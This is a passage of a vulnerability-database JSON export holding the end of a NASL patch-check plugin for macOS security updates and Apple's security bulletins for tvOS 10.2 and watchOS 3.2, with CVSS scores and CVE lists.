egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "apple": [{"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:50", "description": "# About the security content of watchOS 3.2\n\nThis document describes the security content of watchOS 3.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 04, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of watchOS 3.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9643", "CVE-2017-2379", "CVE-2017-2390", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:4D5D6CE943DE7279F91D23CD74879D4C", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:17", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by 